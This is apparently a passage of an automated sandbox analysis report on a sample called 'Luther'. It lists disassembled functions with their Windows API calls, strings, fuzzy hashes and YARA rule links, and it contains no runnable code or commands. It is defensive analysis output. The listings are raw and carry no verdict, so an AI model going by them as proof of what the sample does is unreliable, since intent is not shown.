CoCreateInstance.OLE32(?,00000000,00000017,00ED0B44,?), ref: 00EB4236
IIDFromString.OLE32(?,?), ref: 00EB42A9
VariantInit.OLEAUT32(?), ref: 00EB4341
VariantClear.OLEAUT32(?), ref: 00EB4393

Strings

Invalid parameter, xrefs: 00EB42C2
Failed to create object, xrefs: 00EB4241, 00EB42F7
NULL Pointer assignment, xrefs: 00EB427B

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 1330b5eccc966a334b56756a04019abb30855b6224041f0f7508b6ff89b414a0
Instruction ID: 866cb3a4bf2332b4e1361007df74ea1c65d9c34c19ec5a13dd90dae8152853ca
Opcode Fuzzy Hash: 1330b5eccc966a334b56756a04019abb30855b6224041f0f7508b6ff89b414a0
Instruction Fuzzy Hash: 9761CFB16083019FD710DF64D889FABBBE4AF49714F041819F981BB2A2C730ED48CB92

Function 00EA8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00EA8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8DDA

Strings

*.*, xrefs: 00EA8DE0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 775c4bd4cd96de9be40d618034e38b240e4eba25071398733639dfe1576906f8
Instruction ID: 73ef3c2beabb2db01563ae518a72af2939ac5b9130828501bdd6a96556b415a3
Opcode Fuzzy Hash: 775c4bd4cd96de9be40d618034e38b240e4eba25071398733639dfe1576906f8
Instruction Fuzzy Hash: E1616CB25043059FCB10EF60C945AAEB7E8FF99314F04582EF989A7251DB31F945CB92

Function 00EC46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00EC4715
SetMenu.USER32(?,00000000), ref: 00EC4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC47AC
IsMenu.USER32(?), ref: 00EC47C0
CreatePopupMenu.USER32 ref: 00EC47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC47F7
DrawMenuBar.USER32 ref: 00EC47FF

Strings

F, xrefs: 00EC47EA
0, xrefs: 00EC46F0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ad4cad153b0b8c0074cc544fbfdb4f4ffaf8ae660a9fa597f57b8f8a8d72b732
Instruction ID: e8e5ef720226596eba91602958143f1d493522b9b15e4a9434f150230cc3f858
Opcode Fuzzy Hash: ad4cad153b0b8c0074cc544fbfdb4f4ffaf8ae660a9fa597f57b8f8a8d72b732
Instruction Fuzzy Hash: 534188B6A01209EFDB14CF65DA58FAA7BB5FF09314F14402DFA05A7390C772A916CB50

Function 00E9282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E928B1
GetDlgCtrlID.USER32 ref: 00E928BC
GetParent.USER32 ref: 00E928D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E928DB
GetDlgCtrlID.USER32(?), ref: 00E928E4
GetParent.USER32(?), ref: 00E928F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E928FB

Strings

ComboBox, xrefs: 00E92839
ListBox, xrefs: 00E9286E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 0fa00709a38b96967e7f8656d8ec2081484274d730eaf6fdcbc8c179bad729a3
Instruction ID: eedcc382de3c67d5f9267740d21d101694e985fedc9c1cfffc74a1051a2db17c
Opcode Fuzzy Hash: 0fa00709a38b96967e7f8656d8ec2081484274d730eaf6fdcbc8c179bad729a3
Instruction Fuzzy Hash: 6421D7B5900218BFCF15AFA0CC85DEEBBB4EF05310F00116ABA51B7291DB764819DB60

Function 00E9290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E92990
GetDlgCtrlID.USER32 ref: 00E9299B
GetParent.USER32 ref: 00E929B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E929BA
GetDlgCtrlID.USER32(?), ref: 00E929C3
GetParent.USER32(?), ref: 00E929D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E929DA

Strings

ComboBox, xrefs: 00E9291A
ListBox, xrefs: 00E9294F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 01b45d5fff74f690827e20c0cf9ad0b2734aa3704c271bcd636a78ffcb979a82
Instruction ID: 5034e0e75d6693302cff9717edb332071e58b0517529d50259e2dd74cfe951da
Opcode Fuzzy Hash: 01b45d5fff74f690827e20c0cf9ad0b2734aa3704c271bcd636a78ffcb979a82
Instruction Fuzzy Hash: 1021A175D00218BFCF11ABA0CC85EFEBBB8EF05304F005066BA51B7291CB764859DB60

Function 00EC44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EC4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EC453C
GetWindowLongW.USER32(?,000000F0), ref: 00EC4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EC45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EC4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EC4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00EC467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00EC4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00EC46AF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: ff0c1c2b9fe281c56a2e94740584e2e13d2d60ede810cdf5e1e15e0df051ac80
Instruction ID: cfde9542e30238eb35b5fa7669d205899adf78668c20be8cadb3ebde1099ca2a
Opcode Fuzzy Hash: ff0c1c2b9fe281c56a2e94740584e2e13d2d60ede810cdf5e1e15e0df051ac80
Instruction Fuzzy Hash: 20618BB5A00208AFDB10DFA4CD81FEE77F8EB09304F10415AFA04A72E1C775AA46EB50

Function 00E9BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E9BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00E9BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BBE4

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: df322606b6a96bee6a8efdcc174b732b8774f1bb513f3db14f53b8ae2030552f
Instruction ID: c046aa8939fff965ad053db00dc9d3747b8e30831c5546dc13c8725306b4853a
Opcode Fuzzy Hash: df322606b6a96bee6a8efdcc174b732b8774f1bb513f3db14f53b8ae2030552f
Instruction Fuzzy Hash: AA3193B2904308AFDF109B15EE84FA97BA9FB4431AF104025FB05F71E4E775A845CB60

Function 00E32AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E32AF9
OleUninitialize.OLE32(?,00000000), ref: 00E32B98
UnregisterHotKey.USER32(?), ref: 00E32D7D
DestroyWindow.USER32(?), ref: 00E73A1B
FreeLibrary.KERNEL32(?), ref: 00E73A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E73AAD

Strings

close all, xrefs: 00E32AF4

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: b6cd17e8dd9f0cac26514d58483fb6c9de64d27be02ffd1f4c2f79da13df5f4c
Instruction ID: c3909281a4766bdc8a314ad5cec2394ab05748afc385a9c4b9ee911d9b7dcfd6
Opcode Fuzzy Hash: b6cd17e8dd9f0cac26514d58483fb6c9de64d27be02ffd1f4c2f79da13df5f4c
Instruction Fuzzy Hash: 69D14C31705212DFCB69EF24C94AA69FBA0BF44714F1162ADE98A7B251CB31AD12DF40

Function 00EA8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8A06
GetFileAttributesW.KERNEL32(?), ref: 00EA8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00EA8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA8AF5

Strings

*.*, xrefs: 00EA8AAB

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: e0a0a32378d1d8eda701be1530e9a1c620fe4c96ea32300792ea3ade456f97fe
Instruction ID: 49bcd70a34af6bc4f5a53bb9eb4644eb3d4e5ba5786e16780ec2c2b45c734bbd
Opcode Fuzzy Hash: e0a0a32378d1d8eda701be1530e9a1c620fe4c96ea32300792ea3ade456f97fe
Instruction Fuzzy Hash: A981A2719043409BCB24EE14C544ABBB7E8BF9A314F54682EF889FB250EF35E945CB52

Function 00E37447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00E374D7

Part of subcall function 00E37567: GetClientRect.USER32(?,?), ref: 00E3758D
Part of subcall function 00E37567: GetWindowRect.USER32(?,?), ref: 00E375CE
Part of subcall function 00E37567: ScreenToClient.USER32(?,?), ref: 00E375F6

GetDC.USER32 ref: 00E76083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E76096
SelectObject.GDI32(00000000,00000000), ref: 00E760A4
SelectObject.GDI32(00000000,00000000), ref: 00E760B9
ReleaseDC.USER32(?,00000000), ref: 00E760C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E76152

Strings

U, xrefs: 00E76021

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2f3ae225c6672dfe576f9d6bfa7c7dbdf32d4dbaed690a99883db81fd42fc6e7
Instruction ID: 2136f3cd2092e86173d47e34fc63ad8717726f75dd54afb1181a898539f4019d
Opcode Fuzzy Hash: 2f3ae225c6672dfe576f9d6bfa7c7dbdf32d4dbaed690a99883db81fd42fc6e7
Instruction Fuzzy Hash: 0E71CF71504605EFCF358F64CC88AEA3FB1FF49318F14A26AE9997A1A6C7319C41DB60

Function 00EC955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0

Part of subcall function 00E319CD: GetCursorPos.USER32(?), ref: 00E319E1
Part of subcall function 00E319CD: ScreenToClient.USER32(00000000,?), ref: 00E319FE
Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000001), ref: 00E31A23
Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000002), ref: 00E31A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00EC95C7
ImageList_EndDrag.COMCTL32 ref: 00EC95CD
ReleaseCapture.USER32 ref: 00EC95D3
SetWindowTextW.USER32(?,00000000), ref: 00EC966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EC9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00EC975B

Strings

@GUI_DRAGFILE, xrefs: 00EC96F6
@GUI_DROPID, xrefs: 00EC96AD

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 588e138fafcec6e043524a533612f81da3fa84917eb0eed897315f3de88dea90
Instruction ID: adf3829f3b6c5c4b4f24b8a6b0aba6828cbd070af5f04d25b9cdfc5578cb8874
Opcode Fuzzy Hash: 588e138fafcec6e043524a533612f81da3fa84917eb0eed897315f3de88dea90
Instruction Fuzzy Hash: CE51B271204304AFD704EF24CD5AFAA7BE4FB84714F40152DF996A72E2CB729909DB52

Function 00EACC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EACCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EACCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EACD0F
GetLastError.KERNEL32 ref: 00EACD67
SetEvent.KERNEL32(?), ref: 00EACD7B
InternetCloseHandle.WININET(00000000), ref: 00EACD86

Strings

, xrefs: 00EACD00

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: f7a4c5e72a6f32bf4bc95ac666acd150a52996795fbcf66155ab7959230e3296
Instruction ID: dc29cd222f89aa1d58c0125c3dbaccead32850a134d7c5f8c02768ffbf01f4b4
Opcode Fuzzy Hash: f7a4c5e72a6f32bf4bc95ac666acd150a52996795fbcf66155ab7959230e3296
Instruction Fuzzy Hash: 313191B1504604AFD7219F658C88EAB7FFCEB4A744B20553EF446BB200DB35ED099B61

Function 00E9A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E755AE,?,?,Bad directive syntax error,00ECDCD0,00000000,00000010,?,?), ref: 00E9A236
LoadStringW.USER32(00000000,?,00E755AE,?), ref: 00E9A23D

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E9A301

Strings

., xrefs: 00E9A2E7
%s (%d) : ==> %s.: %s %s, xrefs: 00E9A26B
Error: , xrefs: 00E9A2CF
Line %d (File "%s"):, xrefs: 00E9A2A7
Line %d:, xrefs: 00E9A28C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: f1521f9037749178234740a2a723a7677b6292447755d4cdced9ecc256ac0b2f
Instruction ID: 1d55503290d97439302cf64f0ca63c8d657ef232af3d9bf8d77c4525d02982a7
Opcode Fuzzy Hash: f1521f9037749178234740a2a723a7677b6292447755d4cdced9ecc256ac0b2f
Instruction Fuzzy Hash: F1214F3180431EEFCF11ABA0CC0AEEE7BB9BF18704F045469F615750A2EB729618DB51

Function 00E929EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00E929F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00E92A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E92A9A

Strings

list, xrefs: 00E92A7C
SHELLDLL_DefView, xrefs: 00E92A19
smallicons, xrefs: 00E92A62
details, xrefs: 00E92A48
largeicons, xrefs: 00E92A2E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: bd90fbc359b5e48df99e9ff538c2bbaab0939d8b839296374bd393736a984908
Instruction ID: ab077bdc9f95e93a5fe59d8b189dc7fa7410567d710d8746c312976e39632f1a
Opcode Fuzzy Hash: bd90fbc359b5e48df99e9ff538c2bbaab0939d8b839296374bd393736a984908
Instruction Fuzzy Hash: F311297764830BBEFE246721DC07DA677EC8F14728B20202AFB04F40D1FBE268454614

Function 00E37567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00E3758D
GetWindowRect.USER32(?,?), ref: 00E375CE
ScreenToClient.USER32(?,?), ref: 00E375F6
GetClientRect.USER32(?,?), ref: 00E3773A
GetWindowRect.USER32(?,?), ref: 00E3775B

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 5bc1c7c83dfd0e9c16771ae82d6bd31c34886a196b3d7e498248bf3a9cd01fb8
